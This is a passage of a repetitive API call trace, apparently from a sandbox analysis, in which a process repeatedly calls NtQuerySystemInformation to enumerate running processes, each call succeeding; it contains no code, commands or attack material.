ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0113.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b4d0) returned 0x0 [0114.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b490) returned 0x0 [0114.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0114.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x1b5d8) returned 0x0 [0130.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x2a2d0, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1d830) returned 0x0 [0130.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x2a2d0, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1d830) returned 0x0 [0130.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x2a2d0, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1d830) returned 0x0 [0130.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x2a2d0, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1d830) returned 0x0 [0130.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x2a2d0, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1d830) returned 0x0 [0136.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1c520) returned 0x0 [0136.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: 